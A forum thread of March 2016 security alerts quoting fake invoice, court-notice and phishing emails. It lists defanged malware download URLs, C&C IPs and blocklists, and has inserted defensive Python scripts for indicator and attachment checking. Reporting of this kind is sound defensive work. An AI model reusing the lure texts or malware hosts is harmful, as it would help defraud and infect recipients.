SPAM frauds, fakes, and other MALWARE deliveries...


2072 replies to this topic

#1666 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 04 March 2016 - 06:06 AM

FYI...

Fake 'Closing bill' SPAM - xls malware leading to Dridex
- http://myonlinesecur...ding-to-dridex/
4 Mar 2016 - "An email with the subject of 'Closing bill' pretending to come from MyBill <mybill.central@ affinitywater .co.uk> with a malicious Excel XLS spreadsheet attachment is another one from the current bot runs...

Screenshot: http://myonlinesecur...er-1024x755.png

4 March 2016: 54138887_51656_18836.xls - Current Virus total detections 5/56*
 MALWR shows a download from http ://17.rent-shops .ru/system/logs/vbry73f34f.exe (VirusTotal 5/56**)
which looks like Dridex banking Trojan. All the XLS attachments are random names/numbers and all created on the fly. So far I have seen -15- or so all with individual file hashes which doesn’t make it easy.
Other download locations so far discovered include
 http ://2.casino-engine .ru/games/megajack/vbry73f34f.exe | http ://prettymom.ru/system/logs/vbry73f34f.exe |
 http ://shop-bedep .com/system/logs/vbry73f34f.exe | desean .com.sg/system/logs/vbry73f34f.exe ...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1457083098/

** https://www.virustot...sis/1457082565/

- http://blog.dynamoo....ill-mybill.html
4 Mar 2016 - "... Some additional download locations and C&C servers to block, from another source (thank you!)
jean-daniel .com.ua/system/logs/vbry73f34f.exe
namkeendelights .com/system/logs/vbry73f34f.exe
Overall, some of these download locations look like good candidates for blocking, especially:
81.177.140.123 (Avguro Technologies Ltd, Russia)
210.245.90.206 (FPT Telecom Company, Vietnam)
89.184.72.57 (Internet Invest Ltd., Ukraine)
These additional C&C servers have been seen before:
78.108.93.186 (Majordomo LLC, Russia)
87.106.8.177 (1&1, Germany)
91.236.4.234 (FHU Climax Rafal Kraj, Poland)
Recommended blocklist:
188.165.215.180
78.108.93.186
87.106.8.177
91.236.4.234
81.177.140.123
210.245.90.206
89.184.72.57
"
___

Fake 'Remittance' SPAM - malicious .rtf attachment
- http://myonlinesecur...-macro-malware/
4 Mar 2016 - "An email with the subject of 'Remittance' coming from random email addresses, companies and names with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
From: Bridgette – WITAN PACIFIC INVESTMENT TRUST <Cunningham.Bridgette3@ leonduniec .com>
Date: Fri 04/03/2016 10:30
Subject: Remittance
Attachment: rem.advice-3798605447.rtf
    Dear Sir/Madam,
    Hope you are well. I am writing you to let you know that full amount specified in the contract has been paid into your bank account on the 1st of March at 14 through BACS payment system and should reach the destination (beneficiary’s) account within 3 working days.
    To see full payment details please refer to the remittance advice note attached to the letter.
    Any queries? Please reply back with your questions and you will receive a prompt and qualitative response as soon as possible. Please do not hesitate to write us.
    Bridgette Cunningham ...


4 March 2016: rem.advice-3798605447.rtf - Current Virus total detections 2/56*
 MALWR is unable to detect any HTTP connection or download any malware, that is probably due to an anti-analysis protection in the word doc RTF. It will almost certainly turn out to download Dridex banking trojan, Locky or another similar ransomware..
Update: Dynamoo[1] has posted some locations for the downloads which appear to be Dridex banking Trojan..
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1457091062/

1] http://blog.dynamoo....rom-random.html
4 Mar 2016 - "This fake financial spam appears to come from random companies. The body text is similar in all cases.
Sample 1:
    From:    Ignacio - Floris of London
    Date:    4 March 2016 at 09:42
    Subject:    Remittance
    Dear Sir/Madam,
    I hope you are well. I am writing you to let you know that total amount qualified in the contract has been sent to your bank account on the 3rd of March at 14 through BACS payment system and should reach the destination (beneficiary's) account within 3 working days.
    To see full payment details please refer to the remittance advice note attached to the letter
     Any queries? Please reply back with your questions and you will receive a prompt and qualitative response as soon as possible. Please do not hesitate to write us.
    Ignacio Knox
    Accounts Payable


... This is the -same- IP as seen here* which Sophos identified as being Dridex.  
Recommended blocklist:
31.131.24.76
24.172.94.181
"
* https://www.sophos.c...d-analysis.aspx
___

The Rules Of Spam ...
- http://bruce.pennypa...-rules-of-spam/
"... Rule #1: Spammers lie...
...  Rule #2: If a spammer seems to be telling the truth, see Rule #1..."
ref via: http://blog.dynamoo.com/
___

New Macro Malware - Uses Forms to Store its Code
- http://blog.trendmic...rms-store-code/
Mar 3, 2016 - "The resurgence and continued prevalence of macro malware could be linked to several factors, one of which is their ability to -bypass- traditional antimalware solutions and sandboxing technologies. Another factor is the continuous enhancements in their routines: just recently, we observe that the macro malware related to DRIDEX and the latest crypto-ransomware variant, Locky ransomware, used Form object in macros to obfuscate the malicious code. With this improvement, it could further aid cybercriminals or attackers to -hide- any malicious activity they perform in their target network or system... Locky ransomware, which is reported to be responsible for compromising the network and encrypting the records of Hollywood Presbyterian Medical Center last February 2016, is the first instance of ransomware that capitalized on malicious macros to infiltrate systems. Typically, ransomware is distributed via compromised websites or spam emails. However, this -variant- deviated and replicated this behavior (use of macros) commonly seen in DRIDEX. Based on our Smart Protection Network data, the top countries by Locky ransomware are Germany, Japan, and the United States:
Top countries affected by Locky ransomware for the past 3 months
> https://blog.trendmi...ky-1024x596.png
DRIDEX, a prevalent online banking malware has its own macro downloader. When we’re conducting our analysis, we found out that most of our DRIDEX detections pertain to its macro downloader and -not- the actual TSPY_DRIDEX. This could suggest that this threat is -still- rampant as ever despite the takedown of some of its command-and-control (C&C) servers last year.
Countermeasures... awareness of such threats and their behavior is one of the initial steps in order to combat their risks. It’s also important to -not-enable-macros- from email attachments as this can add another layer of protection to prevent the download of malicious files on the system. For enterprises or organizations, it may be best to block email messages with attachments from suspicious sources."
(More detail at the trendmicro URL at the top of this post.)
 

:ph34r: :ph34r:   <_<


Edited by AplusWebMaster, 05 March 2016 - 09:20 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

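Added example, not from the post above or the quoted blogs: the download locations and "Recommended blocklist" entries in these posts are defanged ("http ://host .tld", "host .tld/path", "a.b.c.d (ASN, Country)"), so they have to be refanged and validated before they are any use in a proxy or firewall. The script refangs a constructed sample written in the same style, keeps only public IPs, drops file names that look like hosts ("18836.xls") and the truncated "virustot..." links, and checks constructed proxy-log lines against the result. The sample text, the proxy-log column layout and the FILE_EXTS filter are assumptions made for this example.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample text in the same defanged style the quoted blogs use:
# "http ://host .tld/path", bare "host .tld/path", and "a.b.c.d (ASN, Country)".
SAMPLE_TEXT = """
4 March 2016: 54138887_51656_18836.xls - Current Virus total detections 5/56*
 MALWR shows a download from http ://17.rent-shops .ru/system/logs/vbry73f34f.exe (VirusTotal 5/56**)
Other download locations so far discovered include
 http ://2.casino-engine .ru/games/megajack/vbry73f34f.exe | http ://prettymom.ru/system/logs/vbry73f34f.exe |
jean-daniel .com.ua/system/logs/vbry73f34f.exe
* https://www.virustot...sis/1457083098/
81.177.140.123 (Avguro Technologies Ltd, Russia)
Recommended blocklist:
188.165.215.180
78.108.93.186
"""

# Constructed proxy log lines (assumed layout): "<time> <client> <method> <url> <status>".
SAMPLE_PROXY_LOG = [
    "2016-03-04T10:12:33Z 10.0.0.5 GET http://17.rent-shops.ru/system/logs/vbry73f34f.exe 200",
    "2016-03-04T10:13:01Z 10.0.0.9 GET http://188.165.215.180/ 200",
    "2016-03-04T10:14:07Z 10.0.0.7 GET https://www.example.com/index.html 200",
]

URL_RE = re.compile(
    r"(?:https?://)?"                  # scheme is optional in the blogs' lists
    r"((?:[a-z0-9-]+\.)+[a-z]{2,})"    # host: one or more labels, then an alphabetic TLD
    r"(/[^\s|\"')]*)?",                # optional path, ends at whitespace, '|', quote or ')'
    re.IGNORECASE,
)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# File extensions that would otherwise be mistaken for TLDs ("18836.xls").
FILE_EXTS = {"exe", "js", "zip", "xls", "doc", "rtf", "png", "php", "html", "pdf"}

def refang(text):
    """Undo the spacing used to neuter links: 'http ://a .b' -> 'http://a.b'."""
    text = re.sub(r"(https?)\s*:\s*//\s*", r"\1://", text, flags=re.I)
    text = re.sub(r"(?<=\S) \.(?=[a-z])", ".", text, flags=re.I)
    return text

def extract_iocs(text):
    """Return sorted, de-duplicated public IPs, hosts and host+path URLs."""
    text = refang(text)
    text = re.sub(r"\S*\.\.\.\S*", " ", text)   # drop truncated 'virustot...sis' links
    ips = set()
    for m in IPV4_RE.finditer(text):
        try:
            ip = ipaddress.ip_address(m.group(0))
        except ValueError:                        # e.g. an octet above 255
            continue
        if ip.is_global:                          # skip RFC1918, loopback, etc.
            ips.add(str(ip))
    hosts, urls = set(), set()
    for m in URL_RE.finditer(text):
        host, path = m.group(1).lower(), m.group(2) or ""
        if host.rsplit(".", 1)[-1] in FILE_EXTS:  # a file name, not a host
            continue
        hosts.add(host)
        if path:
            urls.add(host + path)
    return {"ips": sorted(ips), "hosts": sorted(hosts), "urls": sorted(urls)}

def check_proxy_line(line, iocs):
    """Return the blocklist entry a proxy log line hits (IP, host or parent domain), else None."""
    host = (urlsplit(line.split()[3]).hostname or "").lower()
    if host in iocs["ips"]:
        return host
    for h in iocs["hosts"]:
        if host == h or host.endswith("." + h):
            return h
    return None

if __name__ == "__main__":
    iocs = extract_iocs(SAMPLE_TEXT)
    print("block hosts:", iocs["hosts"])
    print("block ips:  ", iocs["ips"])
    for line in SAMPLE_PROXY_LOG:
        print(check_proxy_line(line, iocs) or "-", line)
```

The host match is suffix-based on purpose: blocking "prettymom.ru" should also catch "www.prettymom.ru". Note that a domain-only blocklist does nothing once the script has been edited to use raw IPs, which is why the dynamoo lists above carry both.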


#1667 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 05 March 2016 - 09:23 AM

FYI...

Fake 'Customer Invoice' SPAM - JS malware Teslacrypt
- http://myonlinesecur...-to-teslacrypt/
5 March 2016 - "An email with the subject of 'Invoice, Ref. 00278908' [random numbered] pretending to come from random email addresses and names with a zip attachment is another one from the current bot runs...
The email looks like:
From: Derrick bolton <boltonDerrick32@ kgorman .ca>
Date: Sat 05/03/2016 07:38
Subject: Invoice, Ref. 00278908
Attachment: Invoice_ref-00278908.zip
Dear Valued Customer,
We are very grateful for your purchase. The specified sum of $679,48 was paid and now your order is being processed by our company.
Delivery information and the invoice can be found in the attached file.
Thank you!
Derrick bolton
Sales Manager ...



5 March 2016 : Invoice_ref-00278908.zip: Extracts to: invoice_ZAwuzp.js (I have seen -4- different zip files by # all extracting to -different- js files) VirusTotal detections [1] [2] [3] [4] all of which according to MALWR [a].. contact http ://ujajajgogoff .com/80.exe?1 where they actually download a file called 69... This site was distributing Teslacrypt ransomware earlier in the week, so this is likely to be the same. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
1] https://www.virustot...sis/1457036665/

a] https://malwr.com/an...mM0ZWJhYTM2MDA/
74.117.183.252
>> https://www.virustot...b138c/analysis/

- https://isc.sans.edu...l?storyid=20801
Last Updated: 2016-03-05 - "We have seen in the last two weeks a massive amount of websites hosting a variant of angler exploit kit that infects computers downloading and activating a variant of teslacrypt... Please keep in mind some countermeasures to avoid infection by Angler EK or ransomware:
• Implement strong antispam, antimalware and antiphishing procedures.
• Keep operating systems patched against known vulnerabilities.
• Install patches from vendors as soon as they are distributed, after performing a full test procedure for each patch.
• Train your users to be careful when opening attachments.
• Configure antimalware software to automatically scan all email and instant-message attachments.
• Configure email programs not to automatically open attachments or automatically render graphics.
• Ensure that the preview pane of your e-mail reader is turned off.
• Use a browser plug-in like noscript to block the execution of scripts and iframes."
___

iCloud PHISH
- http://myonlinesecur...cloud-phishing/
5 March 2016 - "'i215061438' pretending to come from Online-iApple <replyonline@ online .apple .org> is one of the latest -phish- attempts to steal your Apple/iCloud account. This one only wants your 'iCloud/Apple email address log in and password'...

Hello [REDACTED]
You received one new message!
SignIn and View
Where we can provide information access and correction, we will do so for free, except where it would require a disproportionate effort. We aim to maintain our services in a manner that protects information from accidental or malicious destruction. Because of this, after you delete information from our services, we may not immediately delete residual copies from our active servers and may not remove information from our backup systems.
Thank you,
The iApple Team


... It is quite easy to mistake-the-URL for a genuine apple site because you are instinctively drawn to the http ://icloudapple .com at the -start- of the URL, where you should be looking at the last-part before the first - otrack .net .. That clearly is -not- an Apple or iCloud site. If you did click the link you would see a webpage looking like this where any email address and password gives you a message saying: 'Your Apple ID or password was incorrect. Forgot password?' .. which is the link to the genuine Apple forgot password site:
> http://myonlinesecur...ng-1024x549.png
The links behind the unsubscribe and 'Click here to view our privacy policy' lead you to the Romanian Security Team forum. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."

otrack .net: 192.185.195.163 >> https://www.virustot...2cd26/analysis/

 

:ph34r: :ph34r:   <_<


Edited by AplusWebMaster, 05 March 2016 - 10:24 AM.

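Added example, not from the post above: the posts keep repeating that a .js inside a .zip "will look like a DOC file" because Windows hides known extensions by default, and the filenames quoted (invoice_ZAwuzp.js, Notice_to_Appear_00736595.doc.js) show the trick. The script builds a constructed zip whose members carry names like those (the member bodies are placeholder text, not the real scripts), shows what Explorer would display for each, and applies a mail-gateway style policy: block script/executable members, double extensions such as .doc.js, and nested archives. The extension lists and the Explorer emulation are assumptions for this example.

```python
import io
import zipfile

# Extensions Windows runs when double-clicked, and the document extensions the lures imitate.
SCRIPT_EXTS = {"js", "jse", "vbs", "vbe", "wsf", "wsh", "hta", "exe", "scr", "bat", "cmd", "ps1"}
DOCUMENT_EXTS = {"doc", "docx", "xls", "xlsx", "pdf", "rtf", "txt"}

def windows_display_name(filename):
    """Emulate Explorer's default 'Hide extensions for known file types':
    the final, registered extension is dropped from what the user sees."""
    base, dot, ext = filename.rpartition(".")
    if dot and ext.lower() in SCRIPT_EXTS | DOCUMENT_EXTS | {"zip"}:
        return base
    return filename

def assess_member(name):
    """Classify one archive member by its real extension(s): ('block'|'allow', reason)."""
    leaf_orig = name.rsplit("/", 1)[-1]
    parts = leaf_orig.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    inner = parts[-2] if len(parts) > 2 else ""
    if ext in SCRIPT_EXTS:
        if inner in DOCUMENT_EXTS:
            shown = windows_display_name(leaf_orig)
            return "block", f"double extension .{inner}.{ext}, shown to the user as '{shown}'"
        return "block", f"script/executable .{ext}"
    if ext == "zip":
        return "block", "nested archive"
    return "allow", ""

def inspect_zip(data):
    """Return (member, verdict, reason) for every file in a zip held in memory."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            verdict, reason = assess_member(info.filename)
            findings.append((info.filename, verdict, reason))
    return findings

def should_quarantine(data):
    """Gateway decision: one blocked member is enough to hold the whole message."""
    return any(v == "block" for _, v, _ in inspect_zip(data))

def build_sample_zip():
    """Constructed stand-in for the attachments quoted above; the member bodies
    are inert placeholder text, not the real scripts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("invoice_ZAwuzp.js", "// placeholder, not the real downloader\n")
        z.writestr("Notice_to_Appear_00736595.doc.js", "// placeholder\n")
        z.writestr("README.txt", "benign text\n")
    return buf.getvalue()

if __name__ == "__main__":
    for member, verdict, reason in inspect_zip(build_sample_zip()):
        print(f"{verdict:5} {member:36} {reason}")
```

The same check catches the later "Pay_Advice_Vendor_...PDF.ZIP" lure: with extensions hidden the attachment itself reads as a PDF, and the .js inside it reads as a document.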


#1668 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 06 March 2016 - 07:01 AM

FYI...

HMRC Tax Refund/iCloud PHISH
- http://myonlinesecur...ishing-attempt/
6 Mar 2016 - "A right mishmash of an email with this HMRC tax phishing attempt. The bots sending these are very confused this morning. The email subject says 'Tax Refund New Message Alert!' but the body is all about an iCloud log in... The email looks like:
From: HM & Customs <1Message@ HMRC .gov.uk>
Date: Sun 06/03/2016 04:50
Subject: Tax Refund New Message Alert!
Attachment: none
    Your ID was used to sign in to App Store  via a web browser.
    Date and Time: March 04, 2016, 14:03 PM PDT
    If you have not signed in to iCloud  recently and believe someone may have accessed your account, you should verify your identity and change your password. Sign in to  HMRC online Services
    Hm & Customs  respects your privacy.


The link behind the 'Sign in to' leads to http ://chefom .com/hmrc .gov.uk/8a9e617ee9a73ddf31d5b21bd3ef46ba/index.php which is known by Internet Explorer Smart filter as well as Chrome and Firefox phishing filters and blocked. There no doubt will be other sites using the same email template that aren’t yet blocked. If you are unwise enough to follow-the-links and have anti-phishing or smart filter turned off, then you see a typical HMRC phishing page which looks very similar to a HMRC genuine page:
> http://myonlinesecur..._HMRC_phish.png "

chefom .com: 192.186.242.105: https://www.virustot...05/information/
>> https://www.virustot...361b2/analysis/
 

:ph34r: :ph34r:   <_<


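Added example for the two phishing posts above (the iCloud lure, whose real host was otrack .net despite an "icloudapple .com" prefix, and this HMRC lure, which put "hmrc .gov.uk" in the path of chefom .com); it is not from the posts or the quoted blog. The full iCloud URL is not given, so the one used below is constructed to have the shape the blog describes. The check finds the registrable domain and flags brand names that appear anywhere else in the URL (leading subdomain labels, user-info, path) when that domain is not one the brand actually uses. `registrable_domain` uses a tiny subset of the Public Suffix List as a stand-in; a real tool should use the full list.

```python
from urllib.parse import urlsplit

# Stand-in for the Public Suffix List (assumption): suffixes under which the
# registrable name is the third label rather than the second.
TWO_LABEL_SUFFIXES = {"co.uk", "gov.uk", "org.uk", "ac.uk", "com.ua", "com.au", "com.sg", "co.jp", "kiev.ua"}

# Brands the lures in this thread imitate, with the domains they really use.
BRANDS = {
    "apple": {"apple.com", "icloud.com"},
    "icloud": {"apple.com", "icloud.com"},
    "hmrc": {"hmrc.gov.uk", "gov.uk"},
}

def registrable_domain(host):
    """'www.hmrc.gov.uk' -> 'hmrc.gov.uk'; 'a.b.otrack.net' -> 'otrack.net'."""
    labels = host.lower().strip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])

def analyze_url(url):
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reg = registrable_domain(host)
    # Everything a victim's eye may land on that is NOT the registrable domain:
    # leading subdomain labels, the user-info before '@', and the path.
    decoys = [host[: -len(reg)].rstrip("."), parts.username or "", parts.path.lower()]
    decoy_text = " ".join(decoys)
    hits = sorted(b for b in BRANDS if b in decoy_text)
    impersonated = [b for b in hits if reg not in BRANDS[b]]
    return {
        "host": host,
        "registrable_domain": reg,
        "brand_hints_outside_domain": hits,
        "verdict": "impersonation" if impersonated else "ok",
    }

if __name__ == "__main__":
    for u in [
        "http://icloudapple.com.signin-verify.otrack.net/login",           # constructed iCloud-style lure
        "http://chefom.com/hmrc.gov.uk/8a9e617ee9a73ddf31d5b21bd3ef46ba/index.php",
        "https://www.hmrc.gov.uk/login",
        "https://appleid.apple.com/",
        "http://apple.com@otrack.net/",                                     # user-info trick
    ]:
        r = analyze_url(u)
        print(f"{r['verdict']:13} {r['registrable_domain']:16} {u}")
```

The "@" case is included because a browser sends everything before "@" as credentials and connects to otrack.net; it is the same mistake the blog describes, just with a different separator.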


#1669 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 07 March 2016 - 07:00 AM

Fake 'Order Confirmation', 'Appear in Court', 'DHL invoice', 'payment proof' SPAM, WordPress plugin backdoor, Payroll and Human Resources - PHISH

 

FYI...

Fake 'Order Confirmation' SPAM - ransomware
- http://blog.dynamoo....on-payment.html
7 Mar 2016 - "This -fake- financial spam comes from various senders with different references, amounts and slightly different addresses. There is a malicious attachment which appears to be ransomware.
    From:    Ellen thorp
    Date:    7 March 2016 at 07:08
    Subject:    Order Confirmation - Payment Successful, Ref. 81096454
    Dear Client,
    Thank you for your transaction of $477,84. The shipping time varies from 3 to 5 business days, however we will do our best so you can receive your order as soon as possible.
    We will send all the information regarding this case to your local post office. They will contact the phone number you provided when the package arrives.
    Double check please the document enclosed to this email.
    Thank you for your order and we hope to see you again as our customer.
    Respectfully,
    Ellen thorp
    Chief Accountant ...


Attached is a randomly-named ZIP file in the format Invoice_ref-81096454.zip which contains a further malicious script file beginning with invoice_, invoice_copy or invoice_SCAN. Detection rates for these vary [1]... These Hybrid Analysis reports on three of the samples [2].. show the script download a malicious binary from:
blablaworldqq .com/80.exe?1
hellomydearqq .com/69.exe?1
hellomydearqq .com/80.exe?1
At the moment, those domains don't seem to be resolving, but if you replace the domains with the IP addresses then it will work. The sites are hosted on the following servers:
51.254.226.223 (OVH, France)
173.82.74.197 (Multacom Corporation, US)
The 69.exe and 80.exe files are actually different, both have a detection rate of 4/54 [3]... Analysis of these files [4]... indicates behaviour consistent with ransomware, and these binaries attempt to phone home...
Recommended blocklist:
51.254.226.223
173.82.74.197
conspec .us
tmfilms .net
iqinternal .com
goktugyeli .com
saludaonline .com
"
1] https://www.virustot...sis/1457338902/

2] https://www.hybrid-a...environmentId=4

3] https://www.virustot...sis/1457338902/

4] https://malwr.com/an...GU5MmJlODc4OTQ/

- http://myonlinesecur...ypt-ransomware/
7 Mar 2016 - "An email with the subject of 'Order Confirmation – Payment Successful, Ref. 67703560' [random numbered] pretending to come from random email addresses, companies and names with a zip attachment is another one from the current bot runs... The name of the alleged sender matches the name of the Chief Accountant. The ref number in subject matches the attachment number. The email looks like:
From: Amie yonk <yonkAmie092@ bumperscuffshrewsbury .co.uk>
Date: Mon 07/03/2016 05:56
Subject: Order Confirmation – Payment Successful, Ref. 67703560 (random numbers)
Attachment: Invoice_ref-67703560.zip
Dear Client,
Thank you for your transaction of $727,71. The shipping time varies from 3 to 5 business days, however we will do our best so you can receive your order as soon as possible.
We will send all the information regarding this case to your local post office. They will contact the phone number you provided when the package arrives.
Double check please the document enclosed to this email.
Thank you for your order and we hope to see you again as our customer.
Respectfully,
Amie yonk
Chief Accountant ...


7 March 2016: Invoice_ref-67703560.zip: Extracts to: invoice_zVVGbu.js - Current Virus total detections 2/56*
 MALWR** shows a download from http ://hellomydearqq .com/69.exe?1 so that tells us that this is Teslacrypt ransomware (VirusTotal 2/56***).. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457330191/

** https://malwr.com/an...jU2ZjI1MDg4MzM/
Hosts
173.82.74.197
50.62.245.1


*** https://www.virustot...sis/1457333744/
___

Fake 'Notice to Appear in Court' SPAM - JS malware leads to Kovter and ransomware
- http://myonlinesecur...and-ransomware/
7 Mar 2016 - "An email with the subject of 'Notice to Appear in Court' coming from no-reply@ mailout .pl with a zip attachment is another one from the current bot runs... The email looks like:
From: no-reply@ mailout .pl
Date: Mon 07/03/2016 10:19
Subject: Notice to Appear in Court
Attachment: Notice_to_Appear_00736595.zip
Notice to Appear,
You have to appear in the Court on the March 15.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.
The copy of Court Notice is attached to this email.
Sincerely,
Adam Middleton,
Court Secretary.


7 March 2016: Notice_to_Appear_00736595.zip: Extracts to: Notice_to_Appear_00736595.doc.js - Current Virus total detections 15/56*
.. MALWR** shows a download of -3- files from http ://mehulic-art .com which are known as Kovter, and other ransomware files. VirusTotal [1] [2] [3].. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457346335/

** https://malwr.com/an...jBjYmUwMWZhNjg/
Hosts
185.58.74.132

1] https://www.virustot...sis/1457304422/

2] https://www.virustot...sis/1457346993/

3] https://www.virustot...sis/1457285169/
___

Fake 'DHL invoice' SPAM - JS malware leads to Locky Ransomware
- http://myonlinesecur...cky-ransomware/
7 Mar 2016 - "An email with the subject of 'Your latest DHL invoice: HSC4387902' [random numbered] pretending to come from e-billing@ dhl .com with a zip attachment is another one from the current bot runs which downloads Locky ransomware...

Screenshot: http://myonlinesecur...02-1024x551.png

7 March 2016: HSC4387902.zip: Extracts to: MNB3492495814.js - Current Virus total detections 1/54*
.. MALWR** shows a download of the -same- Locky ransomware version as mentioned in THIS post*** from http ://shapes .com.pk/system/logs/87tg7v645c.exe
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457349592/

** https://malwr.com/an...zJiMjFiOGFlYmE/
Hosts
50.87.248.127

*** http://myonlinesecur...cky-ransomware/
___

Fake 'payment proof' SPAM - JS malware leads to Locky Ransomware
- http://myonlinesecur...cky-ransomware/
7 Mar 2016 - "An email with the subject of 'payment proof' pretending to come from SunBeverages <Info@ sunbeverages .eu> with a zip attachment is another one from the current bot runs... The email looks like:
From: SunBeverages <Info@ sunbeverages .eu>
Date: Mon 07/03/2016 09:42
Subject: payment proof
Attachment: 169990489_0492729.zip (random numbers)
    Please see attached proof of payment...


5 March 2016: 169990489_0492729.zip: Extracts to: SPL6767845811.js - Current Virus total detections 1/57*
.. MALWR** shows a download of Locky ransomware from http ://aqarhits .com/system/logs/87tg7v645c.exe
(VirusTotal 4/56***).. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457347704/

** https://malwr.com/an...GE4MmU0ZTc4NGM/
Hosts
162.210.102.210
46.108.39.18


*** https://www.virustot...sis/1457348069/
TCP connections
212.47.223.19: https://www.virustot...19/information/
___

Fake 'E-Service Invoice' SPAM - leads to malware
- http://blog.dynamoo....europe-ltd.html
7 Mar 2016 - "This -fake- financial spam leads to malware:
    From     Andrew Williams [andrew.williams@ eurocoin .co.uk]
    Date     Mon, 07 Mar 2016 17:37:49 +0530
    Subject     E-Service (Europe) Ltd Invoice No: 10013405
    Dear Customer,
    Please find your invoice attached from E-Service (Europe) Ltd. We kindly ask you
    to make payment for all transactions on or before their due date.
    Please contact E-Service (Europe) if you have any issues or queries preventing your
    prompt payment ...


Attached is a ZIP file named Invoice 10013405.zip which contains one of a wide range of randomly-named scripts. A trusted third party analysis (thank you!) shows that there are download locations.. The dropped binary has a detection rate of 5/56* and the Malwr report** clearly shows this is the Locky ransomware. My contact reports that the malware phones home to:
192.121.16.196 (EDIS, Netherlands)
46.108.39.18 (EDIS, Romania)
212.47.223.19 (Web Hosting Solutions OY, Estonia)
109.237.111.168 (Krek Ltd, Russia)
185.92.220.35 (Choopa LLC, Netherlands)
89.108.85.163 (Agava Ltd, Russia)
192.71.213.69 (EDIS, Spain)
Recommended blocklist:
192.121.16.196
46.108.39.18
212.47.223.19
109.237.111.168
185.92.220.35
89.108.85.163
192.71.213.69
"

- http://myonlinesecur...cky-ransomware/
7 Mar 2016 - "An email with the subject of 'E-Service (Europe) Ltd Invoice No: 10013405' [random numbered]  pretending to come from Andrew Williams <andrew.williams@ eurocoin .co.uk> with a zip attachment is another one from the current bot runs which downloads LOCKY RANSOMWARE.. The email looks like:
From: Andrew Williams <andrew.williams@ eurocoin .co.uk>
Date: Mon 07/03/2016 11:39
Subject:  E-Service (Europe) Ltd Invoice No: 10013405  ( random numbers)
Attachment: Invoice 10013405.zip
    Dear Customer,
    Please find your invoice attached from E-Service (Europe) Ltd. We kindly ask you to make payment for all transactions on or before their due date...


7 March 2016: Invoice 10013405.zip: Extracts to: YOJ5879833117.js - Current Virus total detections 2/54*
.. MALWR** shows a download of Locky ransomware from http ://kiddyshop.kiev .ua/image/data/87tg7v645c.exe (VirusTotal 5/54***) Which is slightly different to today’s earlier versions. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457354372/

** https://malwr.com/an...2QzMzNjMmU5ZWU/
Hosts
176.114.0.200
185.92.220.35


*** https://www.virustot...sis/1457355960/
TCP connections
192.121.16.196: https://www.virustot...96/information/
___

WordPress plugin opens backdoor, steals user credentials
- https://www.helpnets...er-credentials/
Mar 7, 2016 - "If you are one of the 10,000+ users of the 'Custom Content Type Manager (CCTM)' WordPress plugin, consider your site to be compromised and proceed to clean your installation up, Sucuri Security researchers have warned. After finding “a very suspicious auto-update.php file inside wp-content/plugins/custom-content-type-manager/” during the cleanup on an -infected- WP site, the researchers have begun digging, and discovered that:
• The file in question is a backdoor that can download additional files from a third-party domain, and save them in the plugin directory
• The CCTM plugin has been available for download from the official WP Plugin Directory for around three years, but hasn’t been updated in the last 10 months. But, some two weeks ago, a new developer (“wooranker”) started -adding- “small tweeks by new owner” and “bug fixes”... Users who want to keep using the plugin are advised to revert to version 0.9.8.6 and to -disable- automatic plugin updates."
> https://blog.sucuri....n-goes-bad.html
Updated Mar 7, 2016
(More detail at both URLs above.)
___

Payroll and Human Resources - PHISH
- https://www.helpnets...-employee-data/
